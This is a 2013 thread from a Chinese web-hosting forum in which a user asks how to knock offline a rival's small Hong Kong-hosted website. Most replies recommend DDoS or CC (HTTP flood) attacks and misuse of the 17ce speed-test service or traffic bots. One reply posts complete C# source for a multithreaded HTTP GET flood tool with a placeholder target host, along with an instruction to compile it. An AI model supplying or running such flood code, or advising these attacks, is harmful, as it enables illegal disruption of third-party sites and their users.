全球主机交流论坛

标题: 求教如何搞垮一个香港小水管网站? [打印本页]

作者: 755348567    时间: 2013-2-1 11:58
标题: 求教如何搞垮一个香港小水管网站?
仇家网站啊,天天到我论坛发水帖和外链。放在双网的香港空间,怎样搞垮它。求教。木有工具。目测17ce也能搞得半死,但是手动蛋疼啊,有木有更好的办法。。
作者: 神马皆浮云    时间: 2013-2-1 12:19
F5
F5
F5
F5
作者: zicca    时间: 2013-2-1 12:21
铜球,不过对方在阿里云
作者: mcm123    时间: 2013-2-1 12:22
发广告的确实可恶
作者: aite.me    时间: 2013-2-1 12:26
ddcc啊
作者: yoth    时间: 2013-2-1 12:26
提示: 作者被禁止或删除 内容自动屏蔽
作者: 小麦    时间: 2013-2-1 12:27
DD虐爆
作者: gaogeli    时间: 2013-2-1 12:31
闭上眼睛,不看它
作者: android    时间: 2013-2-1 12:39
dd&cc
作者: 755348567    时间: 2013-2-1 12:45
yoth 发表于 2013-2-1 12:26
用17ce,在监控宝建个监控
每3分钟访问一次17ce的那个检测链接
估计有效

这个可行吗...
作者: 啪啪啪啪啪    时间: 2013-2-1 13:02
提示: 作者被禁止或删除 内容自动屏蔽
作者: 755348567    时间: 2013-2-1 13:07
yoth 发表于 2013-2-1 12:26
用17ce,在监控宝建个监控
每3分钟访问一次17ce的那个检测链接
估计有效

目测17ce是ajax木有链接。
作者: yoth    时间: 2013-2-1 13:09
提示: 作者被禁止或删除 内容自动屏蔽
作者: yoth    时间: 2013-2-1 13:12
提示: 作者被禁止或删除 内容自动屏蔽
作者: joyanhui    时间: 2013-2-1 13:20
yoth 发表于 2013-2-1 13:12
我错了,果然不行

效果如何????
作者: 满意沟通    时间: 2013-2-1 14:03
yoth 发表于 2013-2-1 13:09
绝对有链接http://www.17ce.com/site/http/84d1afedd0299ead06624442a9aa992c.html

这个是结果链接...
作者: silmoon    时间: 2013-2-1 14:06
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Net;
  4. using System.Net.Sockets;
  5. using System.Text;
  6. using System.Threading;

  7. namespace httpgetflood
  8. {
  9.     class Program
  10.     {
  11.         static EndPoint ep = null;
  12.         static byte[] sendData = null;
  13.         static string hostName = "www.baidu.com";
  14.         static string uri = "/";

  15.         static void Main(string[] args)
  16.         {
  17.             ep = (EndPoint)new IPEndPoint(Dns.GetHostAddresses(hostName)[0], 80);
  18.             sendData = Encoding.Default.GetBytes("GET " + uri + " HTTP/1.1\r\nHOST: " + hostName + "\r\n\r\n");

  19.             for (int i = 0; i < 1000; i++)
  20.             {
  21.                 Thread t = new Thread(th);
  22.                 t.IsBackground = true;
  23.                 t.Start();
  24.             }
  25.             Console.ReadLine();
  26.         }
  27.         static void th()
  28.         {
  29.             while (true)
  30.             {
  31.                 Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  32.                 socket.ReceiveTimeout = 3000;
  33.                 try
  34.                 {
  35.                     socket.Connect(ep);
  36.                     Console.Write("#");
  37.                     while (true)
  38.                     {
  39.                         byte[] recvData = new byte[512];
  40.                         socket.Send(sendData);
  41.                         Console.Write(".");
  42.                         int i = socket.Receive(recvData);
  43.                         if (i > 7)
  44.                         {
  45.                             Console.Write(Encoding.Default.GetString(recvData, 0, 7));
  46.                         }
  47.                         else
  48.                             Console.Write("E");
  49.                     }
  50.                 }
  51.                 catch (Exception ex)
  52.                 {
  53.                     socket.Dispose();
  54.                     Console.WriteLine(ex.Message);
  55.                 }
  56.             }
  57.         }
  58.     }
  59. }
复制代码
自己编译。
作者: 风之翼灵    时间: 2013-2-1 14:06
话说17ce怎么搞
作者: 755348567    时间: 2013-2-1 14:13
silmoon 发表于 2013-2-1 14:06
自己编译。

小白,看不懂求解释求带
作者: 755348567    时间: 2013-2-1 14:14
aite.me 发表于 2013-2-1 12:26
ddcc啊

你的网站肿么了?
作者: 冰剑    时间: 2013-2-1 14:22
DDCC 阿里云小水管很容易瓜的
作者: 采花大盗    时间: 2013-2-1 14:35
yoth 发表于 2013-2-1 12:26
用17ce,在监控宝建个监控
每3分钟访问一次17ce的那个检测链接
估计有效

默认有缓存.
作者: 755348567    时间: 2013-2-1 18:47
tozhuce 发表于 2013-2-1 15:06
话说这是广告贴?

如果17ce是我的网站我还需要发广告?。。。
作者: Captain    时间: 2013-2-1 18:52
小规模cc即可
作者: thymol    时间: 2013-2-1 19:05
提示: 作者被禁止或删除 内容自动屏蔽
作者: 信仰    时间: 2013-2-1 19:33
直接打死
作者: yjlml    时间: 2013-2-1 19:35
小流量就可以搞死HK 小水管了
作者: ccc    时间: 2013-2-1 19:36
cc即可
作者: 椰子    时间: 2013-2-1 19:58
cc把,小水管的瞬间带走,实在不行,实际上国内的带宽给他占完就ok
作者: greyboy    时间: 2013-2-1 20:37
下载个流量精灵  开启自己刷流量  访问17ce那个页面




欢迎光临 全球主机交流论坛 (https://fd.vvwvv.eu.org/) Powered by Discuz! X3.4